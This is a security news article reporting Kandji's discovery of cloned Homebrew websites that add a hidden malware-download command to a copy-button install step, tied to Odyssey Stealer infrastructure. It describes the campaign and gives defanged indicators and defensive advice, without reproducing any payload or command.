Ddos 
Image: Kandji
Researchers from Kandji’s Threat Intelligence team uncovered a malware campaign targeting macOS users through spoofed Homebrew installer websites, cleverly crafted to mirror the official brew.sh homepage. The fake sites inject malicious payloads under the guise of legitimate installation commands — tricking developers into compromising their own machines.
Homebrew, a popular macOS package manager, has so far avoided the kind of supply-chain compromises that have plagued NPM and PyPI ecosystems. But Kandji warns that attackers are now bypassing the software supply chain entirely, instead focusing on users who follow online installation instructions.
“Kandji Threat Intelligence has seen a recent increase in attackers using spoofed Homebrew webpages to get users to download malware… all resolving to 38[.]146[.]27[.]144. These domains showed a carbon copy of the real Homebrew webpage at brew.sh.”
Researchers identified at least four fake domains — including homebrewoneline[.]org — that replicate the appearance and layout of the official Homebrew site with near-perfect accuracy.
The malicious pages employ a social engineering trick that replaces the normal copy-paste installation process with a single “Copy” button, allowing attackers to inject hidden commands.
“Rather than allowing users to highlight and copy the install command, the page forces them to use a single Copy button. That restriction is purposeful: it enables the attacker to inject an extra hidden command into the clipboard… which downloads a malicious payload in parallel with the Homebrew installer.”
This technique echoes a growing class of clipboard injection attacks, similar to the “ClickFix” social engineering campaign, where hidden payloads are embedded in copied shell commands.
Kandji’s team found that the cloned sites use embedded JavaScript to both restrict manual copying and log victim interactions. The script also includes Russian-language comments, revealing placeholders for attacker-defined payloads and data exfiltration mechanisms.
When the Copy button is clicked, the script sends a JSON payload containing click time and metadata to a notify.php endpoint — effectively logging every potential victim interaction for later analysis.
The same IP infrastructure hosting the fake Homebrew sites was previously linked to the Odyssey Stealer malware, which harvests credentials and browser data from infected macOS systems. Kandji’s analysis suggests that this spoofing campaign may be part of a larger, commodity-style threat operation.
“Combined with observed behavior of the same infrastructure downloading the Odyssey Stealer, the artifacts point to an active, commodity-style threat operation rather than a one-off.”
Before Kandji’s public disclosure, the sites were updated to include an active, base64-encoded cURL payload, confirming live deployment of the malicious installer.
Kandji warns that developers are the prime target, as package managers like Homebrew are heavily used in enterprise development environments — often with administrative privileges and access to source code repositories.
The firm emphasizes that users should only install Homebrew from the official brew.sh domain and verify commands manually rather than relying on “Copy” buttons or one-liners from untrusted sources.
Donate